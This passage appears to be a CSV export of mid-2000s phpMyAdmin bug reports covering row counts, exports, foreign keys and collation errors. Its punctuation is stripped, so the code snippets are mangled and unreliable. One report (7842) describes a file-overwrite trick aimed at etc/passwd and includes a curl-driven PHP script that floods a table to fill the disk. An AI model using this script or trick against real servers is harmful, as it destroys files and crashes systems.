sql limit to append .
regs[3]; \} else \{ display query = display query .
sql limit to append; \} \} else \{ display query = full sql query; \} This code does not exist in 2.6.0 RC1 and upon commenting it out in 2.6.0 final everything works as expected.
This definitely needs to be looked into as it is a serious useability issue.
To recreate the issue, submit any query, then click on refresh.
On a table which has millions of rows before, you will suddenly see it only has 30 rows now due to the limit being added to the query which counts rows in the table.
Original URL https sourceforge.net p phpmyadmin bugs 1458 https sourceforge.net p phpmyadmin bugs 1458 Original author jsjohnst Found in version 2.6.0","bug"
"24444","7823","problem with database restore and safe mode is on.
When you try to restore a dump and safe mode or open basedir) is on, the file exists ) call on line 79 of read dump.php will probably provoque an error if file is uploaded in a directory outside of open basedir At this line, we have a call to file exists ) and later on next line a check for is uploaded file ), the test whould be first on is uploaded file ), that way if it succeds, no call to file exists ) will be made, and the handling with copy in tmp direcotry would work correctly.
I have it with 2.5.6, but the code looks the same with 2.6.0rc3 Original URL https sourceforge.net p phpmyadmin bugs 1453 https sourceforge.net p phpmyadmin bugs 1453 Original author domi Found in version 2.5.6","bug"
"24444","7824","Wrong left frame reloading after dropping tables.
After dropping multiple tables from database tables list check few tables, from drop down list choose drop and confirm action) left frame refreshes, but with no database selected.
Original URL https sourceforge.net p phpmyadmin bugs 1455 https sourceforge.net p phpmyadmin bugs 1455 Original author toszcze Found in version Latest Git snapshot","bug"
"24444","7825","left frame don t group table names separated by separators.
Config variable cfg[ LeftFrameTableSeparator ] will not work in version 2.6.0 but worked in my last used version 2.5.2.1.
I m using PHP 4.3.4 with Apache 2.0.48 and Mysql 4.0.15 on MacOSX Panther 10.3.5 Original URL https sourceforge.net p phpmyadmin bugs 1457 https sourceforge.net p phpmyadmin bugs 1457 Original author ffe","bug"
"24444","7826","Wrong sql statement after updating record.
After updating an existing record PMA displays the SQL statement that has updated the database.
Affected rows SELECT FROM `con actionlog` LIMIT 0 , 30 I think this is not the statement that should be displayed... affected versions first noticed in 2.6 rc2 and in latest CVS date 29.
September 2004) Original URL https sourceforge.net p phpmyadmin bugs 1459 https sourceforge.net p phpmyadmin bugs 1459 Original author mortalan Found in version Latest Git","bug"
"24444","7827","wrong key sorting in browse foreigners.php.
There are 2 columns in browse foreigners.php .
The first one sorted by Keyname, the second one sorted by Description.
The description sorted column is OK, but keyname sorted column seems to be sorted only from the second column rows.
This bug occures only when there is more pages in browse foreigners.php.
Example I have key desc pairs 1 a 2 b 3 c 4 a 5 b 6 c 7 a .
.
etc I get on first page at browse foreigners.php 1 a a 1 4 a a 4 7 a a 7 I would expect 1 a a 1 2 b a 4 3 c a 7 Excuse for my poor English ) Original URL https sourceforge.net p phpmyadmin bugs 1460 https sourceforge.net p phpmyadmin bugs 1460 Original author vobornik Found in version 2.6.0 pl1","bug"
"24444","7828","bug in zip.lib.php.
phpMyAdmin 2.6.0pl1 php 4.3.5 zlib 1.1.4 apache 2.0.49 i have noticed this bug while trying to open an export file compressed with zip in 7zip http sf.net projects sevenzip).
7zip can t open zip files exported from phpMyAdmin.
i have talked to the author of 7zip and he told me to comment these lines ll.
127 129) data descriptor segment optional but necessary if archive is not served as file) fr .= pack V , crc); crc32 fr .= pack V , c len); compressed filesize fr .= pack V , unc len); uncompressed filesize that fixes the problem, but i don t know, if these lines can be left out, because i don t know what necessary if archive is not served as file exactly means.
perhaps phpMyAdmin doesn t need this function and yoou could comment the lines, too, to make the zip files more zip compatible.
regards, henrik Original URL https sourceforge.net p phpmyadmin bugs 1461 https sourceforge.net p phpmyadmin bugs 1461 Original author hampelratte Found in version 2.6.0 pl1","bug"
"24444","7829","tbl addfield.php Missing parameter num fields.
Seen in latest CVS on attempt to add a field to a table.
Original URL https sourceforge.net p phpmyadmin bugs 1462 https sourceforge.net p phpmyadmin bugs 1462 Original author lem9 Found in version 2.10.1","bug"
"24444","7830","Tabbing from value to value.
While inserting or editing, in previous versions, we could tab from value to value, now it alternates from value to function.
Original URL https sourceforge.net p phpmyadmin bugs 1463 https sourceforge.net p phpmyadmin bugs 1463 Original author lem9 Found in version 2.6.0 pl1","bug"
"24444","7831","Zend 1 Compatibility Mode and MySQLi.
Hello everyone, When using MySQLi and Zend installed on your Machine I do have the full package with Server Center, etc...) you must include an ini set and set the zend compatibilty=0.
If not you be getting an error when calling the mysqli object which tells that you are trying to clone a non clonable object.
This bug is a critical one since you can t get access to either information due to be a fatal PHP error.
Original URL https sourceforge.net p phpmyadmin bugs 1464 https sourceforge.net p phpmyadmin bugs 1464 Original author almadanet Found in version 2.6.0 pl1","bug"
"24444","7832","phpMyAdmin 2.6.0 pl1 Insufficient space to save.
phpMyAdmin 2.6.0 pl1 Insufficient space to save When I use option Save on server in usr local www ... And I export my database phpMyAdmin says Insufficient space to save the file usr local www soft but all files are saved ok.
So this is just an error in english translation or native language!
As phpMyAdmin 2.5.7 pl1 says Dump has been saved to file usr local www Also when I save the same database in phpMyAdmin 2.5.7 pl1 and then in phpMyAdmin 2.6.0 pl1 they have some difference in size but equal in contents.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 1465 https sourceforge.net p phpmyadmin bugs 1465 Original author makc666","bug"
"24444","7833","empty page.
iam running PHP Version 4.3.9, Apache version 1.3.31 when I try to run new version of phpmyadmin 2.6.0 pl1) after upload and settting PmaAbsoluteUri and U P in config file I receive only lt;html gt; lt;body gt; lt; body gt; lt; html gt; when I try to access the directory where I have uploaded it older version phpMyAdmin 2.4.0) works with no problem I tryed to set OBGzip to FALSE but it do not help PHP is configured as .
configure with apxs= usr local apache bin apxs with mysql with gd= usr local with jpeg dir= usr lib with png dir= usr lib with zlib dir= usr lib enable ftp enable sockets enable sysvsem enable sysvshm with imap=.. imap imap 2002e with imap ssl=.. imap imap 2002e with openssl Also I use Zend Optimizer v2.5.5 Zend Performance Suite v4.0.2 Original URL https sourceforge.net p phpmyadmin bugs 1466 https sourceforge.net p phpmyadmin bugs 1466 Original author mrudolf2 Found in version 2.6.0 pl1","bug"
"24444","7834","UNIX TIMESTAMP function ignores parameter.
I had this problem with the versions 2.6.0 rc3 and 2.6.0 pl1 but not with 2.5.7 pl1 If I enter a value in a Integer field and use the UNIX TIMESTAMP function to convert a date into a timestamp entry in the field eg.
2004 05 05 12 00) is ignored and the timestamp of the current time when the entry is made) gets written in the database.
Original URL https sourceforge.net p phpmyadmin bugs 1467 https sourceforge.net p phpmyadmin bugs 1467 Original author captaine Found in version 2.6.0 pl3","bug"
"24444","7835","DATE values exported as binary.
If export binary data as hex is checked when exporting data, DATE and DATETIME field values are exported as hexadecimal rather than as strings.
Observed with MySQL versions 4.1.4 gamma and 5.0.1 alpha, running on IIS 5.0 Win2K.
I don t believe that this is the correct behaviour, nor can I see it being useful, since MySQL is going to be expect these to be strings for purposes of import.
Original URL https sourceforge.net p phpmyadmin bugs 1468 https sourceforge.net p phpmyadmin bugs 1468 Original author zontar Found in version 2.6.0 pl1","bug"
"24444","7836","adding field with collation doesn t work.
1\.
collation settings is ignored when adding field to table 2\.
you get warning Notice Undefined variable field charset in ... pma tbl addfield.php on line 66 [yes I finally upgraded to MySQL 4.1.x )] Original URL https sourceforge.net p phpmyadmin bugs 1469 https sourceforge.net p phpmyadmin bugs 1469 Original author nijel Found in version Latest Git","bug"
"24444","7837","Showing all databases for mysql 3 series.
Hello I had a problem with phpMyAdmin 2.6.0 and 2.6.0 pl1, when using them with mysql servers from the 3.23.52 series.
It would list all the databases, no matter which user was logged in.
The problem doesn t happen with mysql 4.0.18.
The webservers are not installed on the same machine as the databases, and uses version 4.x of the client libraries.
I ve read the FAQ and followed the instructions to create a controluser, which wasn t needed on older phpMyAdmin releases, but this hasn t corrected the problem.
Reading the code I ve found the following possible bug, on the part that returns the list of databases from a server version 2.6.0 pl1 file libraries database interface.lib.php line 43 Before MySQL 4.0.2, SHOW DATABASES could send the whole list, so check if we really have access if PMA MYSQL CLIENT API lt; 40002) \{ This test is not correct, because it takes the client version into account, while the correct would be using the server version.
Would it be possible to create a new constant, PMA MYSQL SERVER API, which would be set with the value from mysql get server info ), and use this constant on the test abot instead?
best regards, Pedro Faria de Miranda Pinto.
Original URL https sourceforge.net p phpmyadmin bugs 1470 https sourceforge.net p phpmyadmin bugs 1470 Original author mutante power b Found in version 2.6.0 pl1","bug"
"24444","7838","Using Zero 0) as field name causes an error.
Creating a table with 0 as field name or alter a table field names with 0 using the forms causes errors.
Ther are some missing quotation marks.
Original URL https sourceforge.net p phpmyadmin bugs 1471 https sourceforge.net p phpmyadmin bugs 1471 Original author toza Found in version 2.6.0","bug"
"24444","7839","Minor bug problem when altering 2 or more rows..
When changing two or more rows you can get an error if u try to swap auto increment or unique data.
Example Two rows to alter.
First col is an auto increment field.
The values are 1 and 2.
When you swap the 1 and 2 you get an error because of the duplicate entry.
Reason might be that phpMyAdmin changes the 1 into a 2 and get an error.
Solution can be a swap into a temporary value like 3).
Original URL https sourceforge.net p phpmyadmin bugs 1472 https sourceforge.net p phpmyadmin bugs 1472 Original author stuchy Found in version 2.6.0 pl1","bug"
"24444","7840","Wrong end of lines in SQL export on non Unix.
As of 2.6.0, all exports have extraneous n new lines.
This causes problems on all imports.
If I turn on invisibles in my text editor and remove the n s it imports correctly.
I m using MySQL 4.1.5, MacOS X 10.3.5, Firefox 1.0PR1, and Safari 1.2.3.
Same problem in both browsers, but it could be a Mac line ending problem.
Original URL https sourceforge.net p phpmyadmin bugs 1473 https sourceforge.net p phpmyadmin bugs 1473 Original author jpinnix Found in version 2.6.0 pl1","bug"
"24444","7841","character set for CSV export.
it would be great if one could set the character set for CSV export; phpMyAdmin always seems to create UTF 8 files; Excel 2000 is unable to correctly import unicode files, though a listbox to set the character set is also missing for text import LOAD DATA INFILE); however, I guess this is impossible for you to solve as LOAD DATA INFILE does not yet?)
offer a way to set the charset of the textfile to import Original URL https sourceforge.net p phpmyadmin bugs 1474 https sourceforge.net p phpmyadmin bugs 1474 Original author kofler Found in version 2.6.0 pl1","bug"
"24444","7842","Security problem in external transformation.
I have discover 2 bugs of security in PMA transformation.
text plain external option 1 permit to erase file with httpd write access.
Ex set option[1] to 1 gt; etc passwd The second bug permit to phpmyadmin user put any number of fake records in PMA transformation DB.
This full the disk and crash system.
This is example of script, is also attached.
!
usr bin php lt;?
user= myUser ; passwd= myPasswd ; server= http www.myserver.com phpmyadmin ; login= curl cookie jar cookie.txt data \ pma username= user pma password= passwd\ server index.php ; exec login); baseurl= server .
sql.php?db=phpmyadmin table=pma table info goto=sql.php sql query= ; for x = 0; x lt; 10; x )\{ value= md5 time )) .
md5 time )); query= INSERT INTO `pma table info` `db name`,`table name`,`display field`) VALUES value , value , value ) ; fullurl= baseurl .
urlencode query); command = curl cookie jar cookie.txt b cookie.txt fullurl ; exec command); \} ?
gt; Original URL https sourceforge.net p phpmyadmin bugs 1475 https sourceforge.net p phpmyadmin bugs 1475 Original author rebusnet Found in version 2.6.0 pl1","bug"
"24444","7843","PDF export broken with utf 8.
PDF export doesn t correctly handle utf 8.
Example attached.
Original URL https sourceforge.net p phpmyadmin bugs 1476 https sourceforge.net p phpmyadmin bugs 1476 Original author nijel Found in version Latest Git","bug"
"24444","7844","STILL wrong row count with large innodb tables.
the below bug http sourceforge.net tracker ?group id=23067 atid=377408 func=detail aid=995732 has been closed for some reason, but the problem still persists ... i have this with every version of phpmyadmin up to 2.6.0pl2.
select count ) always returns the correct value, phpmyadmin changes row count with every browser reload.
even worse, if the actual number of rows is smaller than the numrows phpmyadmin thinks the table has, clicking gt; gt; end of table) doesn t work no results found).
i ve attached 3 screenshots, have a look at the rowcounts for eg so 1120 ... this from a beta db with no activity, so it s not the table acually changing.
Original URL https sourceforge.net p phpmyadmin bugs 1477 https sourceforge.net p phpmyadmin bugs 1477 Original author monotoy Found in version 2.6.0 pl2","bug"
"24444","7845","Selecting from Temporary Tables one connection) doesn t wrk.
If I open the sql box, and run something like this CREATE TEMPORARY TABLE a SELECT FROM b; SELECT FROM a; I get no results.
This worked in 2.5.7 pl1.
Original URL https sourceforge.net p phpmyadmin bugs 1479 https sourceforge.net p phpmyadmin bugs 1479 Original author hplsbyufan Found in version 2.6.0 pl2","bug"
"24444","7846","Light mode does not work.. Downloaded phpmyadmin 2.6.0 rc2 today.
Running Firefox 0.9.3 on Windows XP.
When I use the non light DB selector cfg[ LeftFrameLight ]=TRUE), I cannot select a database.
When I make a selection from the drop down box, the javascript console displays the error Error remove focus select is not defined No database is selected.
Original URL https sourceforge.net p phpmyadmin bugs 1478 https sourceforge.net p phpmyadmin bugs 1478 Original author arantius Found in version 2.6.0 pl2","bug"
"24444","7847","Save on server uncompressed bad error msg.
I m trying out for the first time the options to save exports directly on the web server, by specifying a directory for that purpose in the config.inc.php.
Since I haven t tried this before, I can t say whether it works correctly in older PMA versions, but in 2.6.0 pl2, I get this behavior If I ask for the file to be saved on the server as a bz2 file, the page reloads after a short time and a message appears at the top saying Dump has been saved to file .. pma out file.sql.bz2 and indeed it has.
But if I ask for an uncompressed file, the message reads Insufficient space to save the file .. pma out file.sql .
This is not in fact true the file was created, and its contents are intact and correct, and exactly match that of the file I get by decompressing the bz2 file according to diff ).
Original URL https sourceforge.net p phpmyadmin bugs 1480 https sourceforge.net p phpmyadmin bugs 1480 Original author ryandesign Found in version 2.6.0 pl2","bug"
"24444","7848","Process List Query Array?.
Sometimes, it shows the word Array in the Query column of the Process List.
Why does it do this?
Original URL https sourceforge.net p phpmyadmin bugs 1481 https sourceforge.net p phpmyadmin bugs 1481 Original author olafvdspek","bug"
"24444","7849","SQL String Error cut Query to it first char.
The bug is still in v2.6.0 pl2 and I didn t check in other version.
If you try query like this SELECT 0 AS `foo You have a SQL Syntax error, right.
But when you use it well, when you press the submit button), you will have that error Query S MySQL a rxc3xa9pondu Documentation 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near S at line 1 Yes Query is S not SELECT 0 AS `foo .
As I found this bug quite annoying, I searched why I had it.
And I corrected it goto libraries read dump.lib.php, then on line 41 at least in 2.6.0pl2), you ll have this if !
i) \{ ret[] = sql; return TRUE; \} The error is that in your logical, each element of ret should also be an array of the form array query = gt; ...), ...) ).
So if you correct this, it should give if !
i) \{ ret[] = array query = gt; sql ); return TRUE; \} Now, that a way better !
Original URL https sourceforge.net p phpmyadmin bugs 1482 https sourceforge.net p phpmyadmin bugs 1482 Original author myshforum Found in version 2.6.0 pl2","bug"
"24444","7850","cfg[ ServerDefault ] = 0 errors.
Version information MySQL 3.23.58 Apache 2.0.50 Fedora PHP 4.3.8 Our configuration uses 3 MySQL server setup, with only 2 3 being access on rare occasions.
We use http type authentication on all three servers, however, we have tried all other combinations to test out theories.
When first visiting the PMA page, we get the following two PHP errors Notice Undefined index auth type in var www html mysql new queryframe.php on line 187 Notice Undefined variable PHP AUTH USER in var www html mysql new queryframe.php on line 189 Both located in the left frame.
We also have no GO button, to pick the localhst server default).
As a reasult, we can only access servers 2 3, which work without issue.
We can then resellect server 1 from the list, and we can login.
This has also been reported on the forums, with myself replying.
Original URL https sourceforge.net p phpmyadmin bugs 1483 https sourceforge.net p phpmyadmin bugs 1483 Original author ppslim Found in version Latest Git","bug"
"24444","7851","Notice Undefined variable db collation.
Running phpMyAdmin 2.6.0 pl2 w mySQL 4.1.0 When I choose a Database I get this at the top of the screen Notice Undefined variable db collation in home [DIRECTORY] wwwroot db details structure.php on line 527 Other than that it runs fine.
And I have always been happy with it.
peter Original URL https sourceforge.net p phpmyadmin bugs 1484 https sourceforge.net p phpmyadmin bugs 1484 Original author mrsticks1982 Found in version 2.6.0 pl2","bug"
"24444","7852","Foreign keys and InnoDB.
I am trying to set up PK FK relationship between InnoDB tables.
I go to relation view; and I see that links are guessed quite nicely.
However, when I press Go I get the following error SQL query ALTER TABLE sbank DROP FOREIGN KEY `0 38` MySQL said 1146 Table phpmyadmin.sbank doesn t exist sbank is the table that I am looking at; it is not in phpmyadmin DB.
phpmyadmin is the PMA database; of course, phpmyadmin.sbank doesn t exist.
Any ideas what could be causing phpMyAdmin to lose track of which database should be prepended to the table name?
Thanks Felix suggested fix Try this in tbl relation.php, at line 75, add this line PMA DBI select db db); just before updates for internal relations or innodb?
Original URL https sourceforge.net p phpmyadmin bugs 1485 https sourceforge.net p phpmyadmin bugs 1485 Original author lem9 Found in version 2.6.0 pl2","bug"
"24444","7853","foreign key errors.
In the relational view for InnoDB, if there are invalid entries in an index i.e they refer to a foreign key value that doesn t exist), phpMyAdmin just goes back to the same page removing the foreign key selection without any error.
If you issue an ALTER TABLE command by hand, MySQL will say 1216 Cannot add or update child row a foreign key constraint fails phpMyAdmin should give some kind of error to explain the problem.
Also, in the relational view, all fields are given as options as foreign keys, however, only indexed fields should be available phpMyAdmin gives an appropriate error here, but the option should never exist in the first place) Original URL https sourceforge.net p phpmyadmin bugs 1486 https sourceforge.net p phpmyadmin bugs 1486 Original author rishikhan Found in version 2.6.0 pl2","bug"
"24444","7854","Inno DB foreign key creting doesn t escape table.
I made a table called order .
Normally when phpMyAdmin works on this table, it escapes it to something like `order`.
However, when I try to make a foreign key, it messes up with no error again).
I presume it s an escaping issue.
When I type it in the sql box, it works fine ALTER TABLE `order` add foreign key car id) REFERENCES car car id) Also, it would be nice if phpMyAdmin showed the SQL statement it tried to execute and any errors) in the relation view.
Original URL https sourceforge.net p phpmyadmin bugs 1487 https sourceforge.net p phpmyadmin bugs 1487 Original author rishikhan Found in version 2.6.0 pl2","bug"
"24444","7855","Query window too small darkblue orange theme.
When using the darkblue orange theme, the query window is not large enough at least in Safari 1.2.3 on Mac OS X 10.3.5.
In Firefox 1.0PR the query window s content is much smaller, but in Safari, the content is too large to fit into the window.
In this case there s probably something in the way that the query window is drawn with the darkblue orange theme that should be changed.
I was also going to suggest that maybe the query window width height should be a theme specific config variable.
Original URL https sourceforge.net p phpmyadmin bugs 1488 https sourceforge.net p phpmyadmin bugs 1488 Original author ryandesign Found in version 2.6.0 pl2","bug"
"24444","7856","querywindow.php Missing parameters db, table.
When I set cfg[ QueryFrameJS ] to FALSE, clicking Query Window in left frame produces an empty page with these messages querywindow.php Missing parameter db querywindow.php Missing parameter table Original URL https sourceforge.net p phpmyadmin bugs 1489 https sourceforge.net p phpmyadmin bugs 1489 Original author ryandesign Found in version 2.6.0 pl2","bug"
"24444","7857","support MySQL 4.1.x new TIMESTAMP features.
in the table structure view, phpMyAdmin shows yes for NULL even if the TIMESTAMP column is declared NOT NULL when changing the table structure other columns, not the TIMESTAMP col), it occured several times to me though not always?
), that the default value for the TIMESTAMP columns was unintenional changed from CURRENT TIMESTAMP to 0000 00 00 00 00 00 I am using MySQL 4.1.5, PHP 5.0.1 mysqli btw, phpMyAdmin seems unable to handle the new TIMESTAMP attributes introduced in MySQL 4.1.2 DEFAULT CURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP etc.
), see http dev.mysql.com doc mysql en TIMESTAMP 4.1.html perhaps is the changed syntax the reason for the problems mentioned above?
Original URL https sourceforge.net p phpmyadmin bugs 1490 https sourceforge.net p phpmyadmin bugs 1490 Original author kofler Found in version 2.6.0 pl1","bug"
"24444","7858","non light left frame with LOT of tables.
i use cfg[ LeftFrameLight ] = FALSE; i want to open a base with lot of tables about 2000) when i move the mouse cursor on the tables the javascript is fucked very slow to show the link in status bar very slow to change color of table vertical scrollbar seems to reaload when leftframelight is set to true, all works normaly.
but i prefer leftframelight = false !
thx.
Original URL https sourceforge.net p phpmyadmin bugs 1491 https sourceforge.net p phpmyadmin bugs 1491 Original author msa2 Found in version 2.6.0 pl2","bug"
"24444","7859","Mutli submit doesn t work in IE.
Hi, in the latest cvs version the multi submit for edit, delete, primary, index, unique and fulltext doesn t work.
I m using InternetExplorer Version 6.0.2900.2180.xpsp sp2 rtm on Windows XP Pro) SP2 and the latest cvs devel of PMA latest ChangeLog 22 Oct 2004 19 52 46 0000 2.773).
How to reproduce select a db and then select a table goto to structur and then select some fields or select all fields) click on one of the icons with selected e.g.
edit ) = gt; the page is reloaded but nothing happened.
In Firefox 0.9.3 or Mozilla 1.7.3 on Windows XP Pro) SP2) it works fine.
Michael Original URL https sourceforge.net p phpmyadmin bugs 1492 https sourceforge.net p phpmyadmin bugs 1492 Original author mkkeck Found in version Latest Git","bug"
"24444","7860","OmniSecure.
I use phpMyAdmin with Web server name OmniSecure at http www.omnicron.ca It show this line when I click at INSERT on TABLE view) Notice Undefined index HTTP HOST in E \phpMyAdmin\header.inc.php on line 44 but it didn t happen with Apache.
I think this variable is only use in apache.
Original URL https sourceforge.net p phpmyadmin bugs 1493 https sourceforge.net p phpmyadmin bugs 1493 Original author jomyut Found in version 2.6.0 rc1","bug"
"24444","7861","Just to test !.
bug Original URL https sourceforge.net p phpmyadmin bugs 1494 https sourceforge.net p phpmyadmin bugs 1494 Original author mypms Found in version 2.2.0","bug"
"24444","7862","top index for user initials.
...won t work.
I m using PMA latest cvs latest ChangeLog v 2.777 2004 10 25 13 28 02) on WinXP, Apache 2.0.52, PHP 5.0.2, MySQL 4.0.21 nt.
With the Changelog from 2004 10 23, there s an alphabetical quicknav on the server privileges.php for selecting users by it s initial.
I ve some users for MySQL e.g.
admin, measuser, pma, pmatest, test) with different privileges.
The caracters A , M , P and T are links.
Clicking on them should query the users with WHERE user LIKE .
initial .
.
But I get an empty result.
Michael Original URL https sourceforge.net p phpmyadmin bugs 1495 https sourceforge.net p phpmyadmin bugs 1495 Original author mkkeck Found in version Latest Git","bug"
"24444","7863","OFFSET not handled correctly.
When sending a query with defining the OFFSET according to the ANSI SQL standard, phpMyAdmin tries to append an extra LIMIT.
For example SELECT FROM foo LIMIT 30 OFFSET 100; Original URL https sourceforge.net p phpmyadmin bugs 1496 https sourceforge.net p phpmyadmin bugs 1496 Original author rabus Found in version Latest Git","bug"
"24444","7864","multi row delete 2.6.1 dev only).
2.6.0 pl2 is OK about this).
Clicking 2 or more rows for a multi row delete, the rows are deleted but an error message is produced.
Original URL https sourceforge.net p phpmyadmin bugs 1497 https sourceforge.net p phpmyadmin bugs 1497 Original author lem9 Found in version Latest Git","bug"
"24444","7865","Duplicate top menu.
Edit a columns properties in table structure, change something and submit the changes.
I get a result page with the top menu tabs shown twice under each other, and after that the executed SQL statement.
Original URL https sourceforge.net p phpmyadmin bugs 1498 https sourceforge.net p phpmyadmin bugs 1498 Original author garvinhicking Found in version Latest Git","bug"
"24444","7866","Multiple SQL result output.
When I choose to edit multiple rows, change something and submit, I will get two SQL result boxes.
The title of the first says affected rows SELECT from table .
The title of the second says Showing rows XX with the same query.
I suppose the displayed query in the first box should be the UPDATE table SET... statements of the rows I changed?
Original URL https sourceforge.net p phpmyadmin bugs 1499 https sourceforge.net p phpmyadmin bugs 1499 Original author garvinhicking","bug"
"24444","7867","Wrong referencing when using aggregate functions.
when using the query SELECT number, numberB, sum time timeB timeB 2 ) AS timesum FROM sorttest GROUP BY number, numberB from this table structure CREATE TABLE `sorttest` `id` tinyint 4) NOT NULL auto increment, `number` varchar 255) NOT NULL default , `time` tinyint 4) NOT NULL default 0 , `numberB` varchar 20) NOT NULL default , `timeB` tinyint 4) NOT NULL default 0 , PRIMARY KEY `id`) ) TYPE=MyISAM AUTO INCREMENT=5 ; INSERT INTO `sorttest` VALUES 1, 123123 , 23, 21 , 42); INSERT INTO `sorttest` VALUES 2, 765765 , 2, 21 , 42); INSERT INTO `sorttest` VALUES 3, 55765 , 45, 22 , 42); INSERT INTO `sorttest` VALUES 4, 44454 , 13, , 42); I get a correct resultset.
But if I sort the columns by the timesum key, I get this query from PMA SELECT number, numberB, sum time timeB timeB 2 ) AS timesum FROM sorttest GROUP BY number, numberB ORDER BY ` sql 3f6 0`.`timesum` ASC LIMIT 0 , 30 So obviously the sql 3f6 0 is strangely and invalid formed.
Original URL https sourceforge.net p phpmyadmin bugs 1500 https sourceforge.net p phpmyadmin bugs 1500 Original author garvinhicking Found in version Latest Git","bug"
"24444","7868","2.6.0 pl2) collation conflict in PMA database.
After upgrading to MySQL 2.1.7 clicking on any table in the table list produces the following type of error Error SQL query SELECT column name, mimetype, transformation, transformation options FROM `pma column info` WHERE db name = whd AND table name = asset client AND mimetype != ) MySQL said 1267 Illegal mix of collations latin1 swedish ci,IMPLICIT) and utf8 general ci,COERCIBLE) for operation = Original URL https sourceforge.net p phpmyadmin bugs 1501 https sourceforge.net p phpmyadmin bugs 1501 Original author modemboy Found in version 2.6.0 pl2","bug"
"24444","7869","Escaping in db name in server privileges.
I have some dbs with an in the name.
You do a str replace in server privileges.php on line 1193 Id server privileges.php,v 2.29 2004 09 14 16 01 55 lem9) echo lt;option value= .
htmlspecialchars str replace , \\ , current db)) .
gt; .
htmlspecialchars current db) .
lt; option gt; .
\n ; Why did you do that?
With this str replace I can t successfully do the following scenario 1\.
create a db with a in the name test db) 2\.
go into privileges 3\.
edit a user 4\.
choose the test db from Add privileges on the following database 5\.
take a look at the top.
it looks like this User user Database test\ db Because of the backslash it is not possible to update the privileges for this db.
Original URL https sourceforge.net p phpmyadmin bugs 1502 https sourceforge.net p phpmyadmin bugs 1502 Original author j0erch","bug"
"24444","7870","Typo when adding a new row to a table.
The following text If field type is enum or set , please enter the values using this format a , b , c ...
If you ever need to put a backslash \ ) or a single quote ) amongst those values, backslashes it for example \\xyz or a\ b ).
has an erroneous es at the end of the last backslash.
The text should read If field type is enum or set , please enter the values using this format a , b , c ...
If you ever need to put a backslash \ ) or a single quote ) amongst those values, backslash it for example \\xyz or a\ b ).
Original URL https sourceforge.net p phpmyadmin bugs 1503 https sourceforge.net p phpmyadmin bugs 1503 Original author noahslater Found in version 2.5.5 pl1","bug"
"24444","7871","Call time pass by reference.
Hi, main.php calls in Lines 218 and 278 the function PMA analyseShowGrant ...) and passes values by reference.
It uses the ampersand operator to force the pass by reference what is deprecated by PHP s design.
Do get rid of this warning simply delete the ampersand operators in front of the passed variables since the called unction is according to what I see declared rightly.
My main.php names itself Id main.php,v 2.62 2004 11 01 13 46 42 lem9 Exp Best, Bernhard Original URL https sourceforge.net p phpmyadmin bugs 1504 https sourceforge.net p phpmyadmin bugs 1504 Original author bardware","bug"
"24444","7872","Native Excel export 255 char limit.
It appears that the native Excel export with the that I suggested some time ago, and which was implemented in 2.6.0 thank you limits the contents of each field to 255 chars.
We just discovered this interesting feature of the Spreadsheet Excel Writer PEAR class when using it in another project.
We do not know yet if there is a way to circumvent this problem, but until one is found, PMA might want to remove the native Excel export, at least when TEXT or BLOB fields are present whose contents could exceed 255 chars, or provide a warning about this problem.
Original URL https sourceforge.net p phpmyadmin bugs 1505 https sourceforge.net p phpmyadmin bugs 1505 Original author ryandesign Found in version 2.6.0 pl2","bug"
"24444","7873","Data truncation in utf mode not correct.
When displayed results in a table are truncated and output is in utf, this truncation sometimes is made between bytes of multi byte character leading to incorrect output.
Original URL https sourceforge.net p phpmyadmin bugs 1506 https sourceforge.net p phpmyadmin bugs 1506 Original author styx123","bug"
"24444","7874","mbstring.func overload breaks phpMyAdmin.
phpMyAdmin does not separate some queries separated with a ; when certain php mbstring options are set.
These queries REPLACE INTO mm translation translations moduleID, componentID, stringID, localeID, `text`) VALUES dev tools.translation , MM DevToolsTranslationComponent , destination locale , en US , Destination locale ), dev tools.translation , MM DevToolsTranslationComponent , destination locale , sv SE , Mxc4xbal sprxc4xbak ); REPLACE INTO mm translation translations moduleID, componentID, stringID, localeID, `text`) VALUES dev tools.translation , MM DevToolsTranslationComponent , source locale , en US , Source locale ), dev tools.translation , MM DevToolsTranslationComponent , source locale , sv SE , Kxc3xa4ll sprxc4xbak ); executes as ONE query, and hence results in an mysql error.
If a change the string Mxc4xbal sprxc4xbak to Mal sprak , the queries does get separated and executes correctly, which made me believe that the error has something to do with character encodings.
Hence I tried commenting out the mbstring.func overload 7 option below, and the queries get separated correctly.
System SuSE Linux Personal 9.1 PHP 5.02 Apache 2.0.49 Linux SuSE) PHPMyAdmin 2.6.0 pl2 php.ini settings that differs from recommended mbstring.language neutral mbstring.internal encoding UTF 8 mbstring.http input UTF 8 mbstring.http output pass mbstring.func overload 7 default charset UTF 8 Thanks, Peter Original URL https sourceforge.net p phpmyadmin bugs 1507 https sourceforge.net p phpmyadmin bugs 1507 Original author palbertsson Found in version 2.6.0 pl2","bug"
"24444","7875","Problems sending export to IE6.
I think there is a problem sending exports using an IE6.
My Database export of HTML Templates is containing External Javascripts ... IE6 seems not to recognize the application octetstream header interprets the export als HTML and therefore tries to download the stated javascript files ... Firefox 1.0 so as Opera exports work properly in this case ... TIA Original URL https sourceforge.net p phpmyadmin bugs 1508 https sourceforge.net p phpmyadmin bugs 1508 Original author zotteltier de Found in version 2.6.0 pl2","bug"
"24444","7876","innoDB comment.
I have SQL script with create table, like this create table user id int 10) unsigned not null auto increment, vlastnik int 10) unsigned not null default 0 , typ enum c , s , a ) not null default c , nazev varchar 128) not null, primary key id), index vlastnik vlastnik), index nazev nazev)) type=InnoDB comment= InnoDB free 9216 kB; `vlastnik`) REFER `Temp user` `id`) ON UPDATE CASCADE ; If I exec this SQL via PMA 2.6.1 dev), table is created, but have corrupted comment foreign keys too) InnoDB free 9216 kB; `vlastnik`) REFER `Temp user` `id`; InnoDB free 11264 kB WinXP, PHP 5.0.0 Original URL https sourceforge.net p phpmyadmin bugs 1509 https sourceforge.net p phpmyadmin bugs 1509 Original author jenix","bug"
"24444","7877","PROCEDURE ANALYSE results without full text width.
The results of PROCEDURE ANALYSE ) are displayed without the full text width option and there s no button to enable it lt; gt;).
Could you enable full text with for this query by default or at least add the button?
Original URL https sourceforge.net p phpmyadmin bugs 1510 https sourceforge.net p phpmyadmin bugs 1510 Original author olafvdspek Found in version 2.6.0 pl2","bug"
"24444","7878","WHERE request impossible under Konqueror.
